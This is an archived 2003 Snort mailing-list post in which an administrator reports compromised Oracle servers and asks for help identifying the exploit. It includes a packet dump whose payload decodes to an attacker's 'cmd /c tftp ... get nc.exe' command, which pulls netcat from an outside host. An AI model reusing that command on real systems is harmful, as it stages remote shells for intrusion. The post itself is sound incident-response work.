Snort mailing list archives
Oracle Compromise (Tftp + Netcat)
From: "Dusty Hall" <halljer () auburn edu>
Date: Wed, 16 Apr 2003 08:57:57 -0500
Several of our Oracle systems were compromised last week and I'm curious to know if anyone else has been hit with this attack or could point me to the exploit information. I'm guessing its "CERT Advisory CA-2003-05" but I'm not 100% sure. Any advise would be greatly appreciated. Here's the payload (post comprimise): 03:47:59.280516 <SOMEOTHERHOST>.4804 > <OURHOST>.1181: P 2735894114:2735894200(86) ack 1993726960 win 64208 (DF) 0x0000 4500 007e 6450 4000 7206 ca2e 3ea3 d5c5 E..~dP@.r...>... 0x0010 83cc 41c6 12c4 049d a312 6e62 76d5 dbf0 ..A.......nbv... 0x0020 5018 fad0 1aa0 0000 0056 0000 0600 0000 P........V...... 0x0030 0000 07fe 4063 6d64 202f 6320 7466 7470 ....@cmd./c.tftp 0x0040 202d 6920 3632 2e31 3633 2e32 3133 2e31 .-i.XX.XXX.213.1 0x0050 3937 2067 6574 2077 696e 646f 7773 2f6e 97.get.windows/n 0x0060 6574 6361 742f 6e63 2e65 7865 2025 7465 etcat/nc.exe.%te 0x0070 6d70 255c 6e05 632e 6578 6500 0131 mp%\n.c.exe..1 Thanks, -Dusty ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. http://thinkgeek.com/sf _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Oracle Compromise (Tftp + Netcat) Dusty Hall (Apr 16)